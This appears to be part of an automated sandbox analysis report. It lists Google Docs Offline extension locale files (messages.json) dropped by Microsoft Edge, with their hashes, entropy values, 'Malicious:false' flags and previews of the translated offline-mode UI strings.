                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                          MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                          SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                          SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                          SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                          MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                          SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                          SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                          SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                          MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                          SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                          SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                          SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                          MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                          SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                          SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                          SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1042
                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                          MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                          SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                          SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                          SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                          MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                          SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                          SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                          SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                          MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                          SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                          SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                          SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                          MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                          SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                          SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                          SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                          Malicious:false
